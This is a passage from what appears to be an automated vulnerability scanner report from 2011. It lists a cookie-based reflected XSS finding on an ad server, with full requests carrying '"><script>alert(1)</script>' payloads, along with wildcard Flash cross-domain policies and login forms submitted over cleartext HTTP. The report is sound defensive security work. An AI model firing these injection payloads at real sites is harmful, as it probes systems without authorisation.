GET /ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024ef6816"><script>alert(1)</script>c086142570

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3NydGIiLCAgYWQ6ICAgICAgICAgICAzMzU0MjQsICBuZXR3b3JrOiAgICAgICJob3VzZSIsICBzaXplOiAgICAgICAgICI3Mjh4OTAiLCAgZnJlcTogICAgICAgICAiMS05OTkiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjEwN2VhNGVjLWU4MWItNGYxOC04NThhLTk4NDRkODJmODg0NSIsICB1c2VyOiAgICAgICAgICJlMzZhMmYyMC05OTg1LTRkY2QtODJlOS02ZmYwMzEyZTAyNGVmNjgxNiI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PmMwODYxNDI1NzAiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInJvcyIsICBkaXY6ICAgICAgICAgICIxMDdlYTRlYy1lODFiLTRmMTgtODU4YS05ODQ0ZDgyZjg4NDUiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMSwgIG5ldHdvcmtfaWQ6ICAgMTExLCAgYWNjb3VudF9pZDogICA0OTQsICBuZXR3b3JrX25hbWU6ICJIb3VzZSBBcnQiLCAgcHVibGlzaGVyX25hbWU6ICJmb3huZXdzIiwgIGVjcG06ICAgICAgICAgIjEuMzgiLCAgZmVjcG06ICAgICAgICAiMS4zOCIsICBmaWxsOiAgICAgICAgICIxMDAuMDAiLCAgcGxhY2VtZW50OiAgICAicm9zIiwgIHJ1bGU6ICAgICAgICAgInJvcyIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMzNTg3NCwgImJ1eSI6MTc4LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWFNYXRoIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzM1OTEwLCAiYnV5Ijo1MDQsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdXJuIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzM1ODgwLCAiYnV5IjoxOTYsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJEYXRhWHUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMzU4ODMsICJidXkiOjIwMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICIiLCAgaG9zdDogICAgICAgICAibmotdGFnMzQifQ==
Content-Length: 1993
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:27 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024ef6816"><script>alert(1)</script>c086142570&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

1.163. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnewsrtb/728x90/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2054b"><script>alert(1)</script>5f8eef092a5 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e2054b"><script>alert(1)</script>5f8eef092a5

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3NydGIiLCAgYWQ6ICAgICAgICAgICAzMzU0MjQsICBuZXR3b3JrOiAgICAgICJob3VzZSIsICBzaXplOiAgICAgICAgICI3Mjh4OTAiLCAgZnJlcTogICAgICAgICAiMS05OTkiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjA2MDZlODJjLWI2MTMtNGFjZC1hYTA0LTFmZGYwZjk5N2IyYSIsICB1c2VyOiAgICAgICAgICJlMzZhMmYyMC05OTg1LTRkY2QtODJlOS02ZmYwMzEyZTAyNGUyMDU0YiI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PjVmOGVlZjA5MmE1IiwgIGNvdW50cnk6ICAgICAgIlVTIiwgIGNpdHk6ICAgICAgICAgIkRhbGxhcyIsICBkbWE6ICAgICAgICAgIDYyMywgIHJlZ2lvbjogICAgICAgIlRYIiwgIGlwOiAgICAgICAgICAgIjE3My4xOTMuMjE0LjI0MyIsICBkZXB0aDogICAgICAgIDEsICB0YXJnZXQ6ICAgICAgICJyb3MiLCAgZGl2OiAgICAgICAgICAiMDYwNmU4MmMtYjYxMy00YWNkLWFhMDQtMWZkZjBmOTk3YjJhIiwgIHVybDogICAgICAgICAgImh0dHA6Ly93d3cuZm94bmV3cy5jb20vcG9saXRpY3MvaW5kZXguaHRtbCIsICBlbGFwc2VkOiAgICAgIDAsICBkZWNpc2lvbjogICAgICJhZCIsICBpbXA6ICAgICAgICAgIDEsICBuZXR3b3JrX2lkOiAgIDExMSwgIGFjY291bnRfaWQ6ICAgNDk0LCAgbmV0d29ya19uYW1lOiAiSG91c2UgQXJ0IiwgIHB1Ymxpc2hlcl9uYW1lOiAiZm94bmV3cyIsICBlY3BtOiAgICAgICAgICIxLjM4IiwgIGZlY3BtOiAgICAgICAgIjEuMzgiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgInJvcyIsICBydWxlOiAgICAgICAgICJyb3MiLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW3sibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMzU4NzQsICJidXkiOjE3OCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhTWF0aCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMzNTkxMCwgImJ1eSI6NTA0LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHVybiAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMzNTg4MCwgImJ1eSI6MTk2LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzM1ODgzLCAiYnV5IjoyMDAsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzM3In0=
Content-Length: 1997
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:26 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
<img width="0" height="0" src="http://p.brilig.com/contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=e36a2f20-9985-4dcd-82e9-6ff0312e024e2054b"><script>alert(1)</script>5f8eef092a5&REDIR=http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e2054b">
...[SNIP]...

2. Flash cross-domain policy  previous  next
There are 5 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


2.1. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Fri, 08 Apr 2011 03:32:10 GMT
Expires: Thu, 31 Mar 2011 03:30:21 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 74684
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

2.2. http://segment-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 09 Apr 2011 00:16:53 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

2.3. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 02 Feb 2010 14:29:34 GMT
Server: Apache
Content-Type: text/xml
Cache-Control: max-age=93
Expires: Sat, 09 Apr 2011 00:17:54 GMT
Date: Sat, 09 Apr 2011 00:16:21 GMT
Content-Length: 1017
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

2.4. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Fri, 08 Apr 2011 20:00:06 GMT
Expires: Sat, 09 Apr 2011 20:00:06 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 15410
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

2.5. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 02 Feb 2010 14:29:34 GMT
Content-Type: text/xml
Cache-Control: max-age=117
Expires: Sat, 09 Apr 2011 00:18:18 GMT
Date: Sat, 09 Apr 2011 00:16:21 GMT
Content-Length: 1017
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

3. Cleartext submission of password  previous  next
There are 5 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://appointron.com/login  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://appointron.com
Path:   /login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login HTTP/1.1
Host: appointron.com
Proxy-Connection: keep-alive
Referer: http://appointron.com/pricing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=145216491.1302288506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=145216491.97359272.1302288506.1302288506.1302288506.1; __utmc=145216491; __utmb=145216491.4.10.1302288506

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Fri, 08 Apr 2011 18:49:52 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
ETag: "8879d27282002ca61af216ed66e18e8a"
X-Runtime: 1ms
Set-Cookie: _base_session=BAh7BzoMY3NyZl9pZCIlZjEzMjVhMzZlNjc0MGFkZjU1MDQyMTBiNzZhOTc5ZTQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--587a67a84dd30f49cd5d102ac1c3a7523ee2b049; domain=.appointron.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
X-Varnish: 1977019555
Age: 0
Via: 1.1 varnish
Content-Length: 12153

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Online Appointment Scheduling and Web Schedule Management | Appointron</title>
<m
...[SNIP]...
<td id='login_content_table_cell'>
<form action="/session" method="post"><div style="margin:0;padding:0">
...[SNIP]...
<td>
<input class="noFocus" id="password" name="password" onkeypress="return submitenter(this,event)" style="font-size: 22px; width: 220px; border: 0px;" type="password" />
</td>
...[SNIP]...

3.2. http://appointron.com/users/new  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://appointron.com
Path:   /users/new

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /users/new?plan_type_id=2 HTTP/1.1
Host: appointron.com
Proxy-Connection: keep-alive
Referer: http://appointron.com/pricing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=145216491.1302288506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _base_session=BAh7BzoMY3NyZl9pZCIlMzYyZDE5YmY5YjlmYThlZTFkNjQ1MjM0NzE0OTljYTUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--1145f79e31b865380099261ac424a3b2abb8835b; __utma=145216491.97359272.1302288506.1302288506.1302288506.1; __utmc=145216491; __utmb=145216491.6.10.1302288506

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Fri, 08 Apr 2011 18:50:02 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
ETag: "e9d79718dce53d6411782b2bf1fdaae0"
X-Runtime: 5ms
Cache-Control: private, max-age=0, must-revalidate
X-Varnish: 1233507530
Age: 0
Via: 1.1 varnish
Content-Length: 11968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<br/>
<form action="/users" method="post"><div style="margin:0;padding:0">
...[SNIP]...
<br/>
       <input id="user_password" name="user[password]" size="30" type="password" />

       <label for="password_confirmation">
...[SNIP]...
<br/>
       <input id="user_password_confirmation" name="user[password_confirmation]" size="30" type="password" />

<br/>
...[SNIP]...

3.3. http://wcax.upickem.net/engine/Splash.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wcax.upickem.net
Path:   /engine/Splash.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /engine/Splash.aspx?contestid=17178 HTTP/1.1
Host: wcax.upickem.net
Proxy-Connection: keep-alive
Referer: http://www.vermontopia.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Set-Cookie: contestid=17178; expires=Tue, 09-Apr-2041 12:31:11 GMT; path=/
Set-Cookie: UPETemporaryShoppingCartID17178=36497604-4/9/2011 8:31:11 AM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: 293976; expires=Tue, 09-Apr-2041 12:31:11 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sat, 09 Apr 2011 12:31:11 GMT
Content-Length: 39215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<center><form name="frmLogin" id="frmLogin" style="display:inline;" method="post" action="splash.aspx">
<table border="0" cellspacing="3" cellpadding="0" style="width:100%;" width="border-collapse:collapse; " class="UPE-StandardTableSmaller">
...[SNIP]...
<input id="txtPasswordDisplay" class="UPE-InputText" style="vertical-align:middle;color:grey;" size="10" value="Password" onfocus="TogglePassword('enter');"><input type="password" name="txtPassword" id="txtPassword" style="vertical-align:middle;display: none;" class="UPE-InputText" size="10" maxlength="10" onblur="TogglePassword('complete');">&nbsp;&nbsp;<input type="Submit" value="Login" class="UPE-ButtonText" style="vertical-align:middle;" onclick="javascript: if (navigator.appName == 'Microsoft Internet Explorer') { if (navigator.cookieE
...[SNIP]...

3.4. http://www.vermontopia.com/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vermontopia.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /favicon.ico HTTP/1.1
Host: www.vermontopia.com
